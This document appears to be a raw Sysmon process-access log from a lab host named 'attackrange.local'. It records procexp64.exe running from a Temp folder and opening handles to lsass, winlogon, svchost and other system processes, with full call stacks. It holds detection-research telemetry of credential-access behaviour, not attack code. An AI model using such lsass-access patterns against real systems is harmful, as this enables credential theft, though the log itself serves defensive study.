mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 